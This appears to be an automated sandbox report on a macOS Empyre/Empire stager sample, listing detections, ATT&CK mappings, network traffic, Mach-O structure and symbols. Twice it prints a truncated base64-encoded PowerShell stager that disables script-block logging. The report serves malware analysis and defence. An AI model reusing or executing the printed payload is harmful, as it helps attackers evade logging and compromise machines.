Play interactive tourEdit tour
Analysis Report SwWPxGBaKt.macho
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths
Classification
Startup |
---|
|
Yara Overview |
---|
No yara matches |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus / Scanner detection for submitted sample | Show sources |
Source: | Avira: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Classification label: |
Source: | Mach-O symbol: | ||
Source: | Mach-O symbol: | ||
Source: | Mach-O symbol: | ||
Source: | Mach-O symbol: |
Source: | Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: |
Hooking and other Techniques for Hiding and Protection: |
---|
Process executable has a file extension which is uncommon (probably to disguise the executable) | Show sources |
Source: | Process executable with extension: | Jump to behavior |
Source: | System or server version plist file read: | Jump to behavior | ||
Source: | System or server version plist file read: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | System Information Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
33% | Virustotal | Browse | ||
45% | ReversingLabs | MacOS.Trojan.Empr | ||
100% | Avira | OSX/Empr.vpkof |
Dropped Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
17.171.27.65 | unknown | United States | 714 | APPLE-ENGINEERINGUS | false | |
17.253.109.202 | unknown | United States | 6185 | APPLE-AUSTINUS | false | |
2.22.90.177 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 538 |
Start date: | 08.04.2021 |
Start time: | 10:55:14 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 3m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | SwWPxGBaKt.macho |
Cookbook file name: | defaultmacfilecookbook.jbs |
Analysis system description: | Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099) |
Analysis Mode: | default |
Detection: | MAL |
Classification: | mal60.evad.macMACHO@0/0@0/0 |
Warnings: | Show All
|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AKAMAI-ASN1EU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Runtime Messages |
---|
Command: | /Users/berri/Desktop/SwWPxGBaKt.macho |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^ SyntaxError: invalid syntax |
Created / dropped Files |
---|
No created / dropped files found |
---|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.354292401855357 |
TrID: |
|
File name: | SwWPxGBaKt.macho |
File size: | 25104 |
MD5: | 480e81fbccf44939cf4ad4d21f9ba230 |
SHA1: | ff68dd82ddd872b04b8605adfc7be8f42bb38b0e |
SHA256: | c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9 |
SHA512: | e914e4dd698df816540b41bbdfa4f342dbc6ebe49e7b2b46e5c8b25fb7b61b4cdcb45b87baec355c3ff3efb30fe6b78dd1037d3616e15dd31d48120e45f0557c |
SSDEEP: | 384:dWvPTo8CduyVFwZqbOpFZ4wYMj+iOPZf6QTN:dQs8SucCqbqZ4vMHQT |
File Content Preview: | ....................P..... .........H...__PAGEZERO..............................................................__TEXT................... ............... ......................__text..........__TEXT......................................................... |
Static Mach Info |
---|
General Information for header 1 | |
---|---|
Endian: | |
Size: | |
Architecture: | |
Filetype: | |
Nbr. of load commands: | |
Entry point: |
segment_command_64 aggregated: 4 |
---|
Name | Value |
---|---|
segname | __PAGEZERO |
vmaddr | 0x0 |
vmsize | 0x100000000 |
fileoff | 0x0 |
filesize | 0x0 |
maxprot | 0x0 |
initprot | 0x0 |
nsects | 0 |
flags | 0x0 |
Name | Value | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
segname | __TEXT | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmaddr | 0x100000000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmsize | 0x2000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
fileoff | 0x0 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
filesize | 0x2000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
maxprot | 0x7 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
initprot | 0x5 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
nsects | 8 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
flags | 0x0 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Datas |
|
Name | Value | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
segname | __DATA | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmaddr | 0x100002000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
vmsize | 0x1000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
fileoff | 0x2000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
filesize | 0x1000 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
maxprot | 0x7 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
initprot | 0x3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
nsects | 10 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
flags | 0x0 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Datas |
|
Name | Value |
---|---|
segname | __LINKEDIT |
vmaddr | 0x100003000 |
vmsize | 0x4000 |
fileoff | 0x3000 |
filesize | 0x3210 |
maxprot | 0x7 |
initprot | 0x1 |
nsects | 0 |
flags | 0x0 |
dyld_info_command aggregated: 1 |
---|
Name | Value |
---|---|
rebase_off | 12288 |
rebase_size | 160 |
bind_off | 12448 |
bind_size | 152 |
weak_bind_off | 0 |
weak_bind_size | 0 |
lazy_bind_off | 12600 |
lazy_bind_size | 264 |
export_off | 12864 |
export_size | 128 |
symtab_command aggregated: 1 |
---|
Name | Value |
---|---|
symoff | 13008 |
nsyms | 66 |
stroff | 14164 |
strsize | 1328 |
dysymtab_command aggregated: 1 |
---|
Name | Value |
---|---|
ilocalsym | 0 |
nlocalsym | 45 |
iextdefsym | 45 |
nextdefsym | 5 |
iundefsym | 50 |
nundefsym | 16 |
tocoff | 0 |
ntoc | 0 |
modtaboff | 0 |
nmodtab | 0 |
extrefsymoff | 0 |
nextrefsyms | 0 |
indirectsymoff | 14064 |
nindirectsyms | 25 |
extreloff | 0 |
nextrel | 0 |
locreloff | 0 |
nlocrel | 0 |
dylinker_command aggregated: 1 |
---|
Name | Value |
---|---|
name | 12 |
Datas |
uuid_command aggregated: 1 |
---|
Name | Value |
---|---|
uuid | b'AQ\x8e\xa1\x17.?\x1c\x82\x08\x884\xdc\x9b\xf4\x8c' |
version_min_command aggregated: 1 |
---|
Name | Value |
---|---|
version | 658176 |
sdk | 658176 |
source_version_command aggregated: 1 |
---|
Name | Value |
---|---|
version | 0 |
entry_point_command aggregated: 1 |
---|
Name | Value |
---|---|
entryoff | 2720 |
stacksize | 0 |
dylib_command aggregated: 4 |
---|
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 2.7.10 |
compatibility_version | 2.7.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 1258.0.0 |
compatibility_version | 300.0.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 228.0.0 |
compatibility_version | 1.0.0 |
Datas |
Name | Value |
---|---|
name | 24 |
timestamp | Thu Jan 1 01:00:02 1970 |
current_version | 1226.10.1 |
compatibility_version | 1.0.0 |
Datas |
rpath_command aggregated: 1 |
---|
Name | Value |
---|---|
path | 12 |
Datas |
linkedit_data_command aggregated: 3 |
---|
Name | Value |
---|---|
dataoff | 12992 |
datasize | 16 |
Name | Value |
---|---|
dataoff | 13008 |
datasize | 0 |
Name | Value |
---|---|
dataoff | 15504 |
datasize | 9600 |
Internal Symbols |
---|
-[AppDelegate .cxx_destruct] |
-[AppDelegate .cxx_destruct] |
-[AppDelegate applicationDidFinishLaunching:] |
-[AppDelegate applicationDidFinishLaunching:] |
-[AppDelegate applicationWillTerminate:] |
-[AppDelegate applicationWillTerminate:] |
-[AppDelegate setWindow:] |
-[AppDelegate setWindow:] |
-[AppDelegate window] |
-[AppDelegate window] |
/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o |
/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o |
AppDelegate.m |
_OBJC_CLASS_$_AppDelegate |
_OBJC_CLASS_$_AppDelegate |
_OBJC_CLASS_$_NSObject |
_OBJC_IVAR_$_AppDelegate._window |
_OBJC_IVAR_$_AppDelegate._window |
_OBJC_METACLASS_$_AppDelegate |
_OBJC_METACLASS_$_AppDelegate |
_OBJC_METACLASS_$_NSObject |
_PyRun_SimpleStringFlags |
_Py_Finalize |
_Py_Initialize |
___stack_chk_fail |
___stack_chk_guard |
__mh_execute_header |
__objc_empty_cache |
_activateStager |
_activateStager |
_main |
_main |
_memcpy |
_objc_autoreleaseReturnValue |
_objc_destroyWeak |
_objc_loadWeakRetained |
_objc_storeStrong |
_objc_storeWeak |
_setlocale |
dyld_stub_binder |
main.m |
External symbols |
---|
_PyRun_SimpleStringFlags |
_Py_Finalize |
_Py_Initialize |
___stack_chk_fail |
_memcpy |
_objc_autoreleaseReturnValue |
_objc_destroyWeak |
_objc_loadWeakRetained |
_objc_storeStrong |
_objc_storeWeak |
_setlocale |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 8, 2021 10:56:08.303731918 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:08.303963900 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:08.417180061 CEST | 443 | 49238 | 17.171.27.65 | 192.168.11.11 |
Apr 8, 2021 10:56:08.417249918 CEST | 443 | 49238 | 17.171.27.65 | 192.168.11.11 |
Apr 8, 2021 10:56:08.417785883 CEST | 49238 | 443 | 192.168.11.11 | 17.171.27.65 |
Apr 8, 2021 10:56:32.378993988 CEST | 49247 | 80 | 192.168.11.11 | 17.253.109.202 |
Apr 8, 2021 10:56:32.379209995 CEST | 49248 | 80 | 192.168.11.11 | 2.22.90.177 |
Apr 8, 2021 10:56:32.389942884 CEST | 80 | 49248 | 2.22.90.177 | 192.168.11.11 |
Apr 8, 2021 10:56:32.390476942 CEST | 49248 | 80 | 192.168.11.11 | 2.22.90.177 |
Apr 8, 2021 10:56:32.400599957 CEST | 80 | 49247 | 17.253.109.202 | 192.168.11.11 |
Apr 8, 2021 10:56:32.401242018 CEST | 49247 | 80 | 192.168.11.11 | 17.253.109.202 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 8, 2021 10:56:35.845971107 CEST | 57325 | 53 | 192.168.11.11 | 1.1.1.1 |
Apr 8, 2021 10:56:35.852438927 CEST | 53 | 57325 | 1.1.1.1 | 192.168.11.11 |
System Behavior |
---|
General |
---|
Start time: | 10:56:05 |
Start date: | 08/04/2021 |
Path: | /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 |
Arguments: | n/a |
File size: | 3722408 bytes |
MD5 hash: | 8910349f44a940d8d79318367855b236 |
General |
---|
Start time: | 10:56:05 |
Start date: | 08/04/2021 |
Path: | /Users/berri/Desktop/SwWPxGBaKt.macho |
Arguments: | /Users/berri/Desktop/SwWPxGBaKt.macho |
File size: | 25104 bytes |
MD5 hash: | 480e81fbccf44939cf4ad4d21f9ba230 |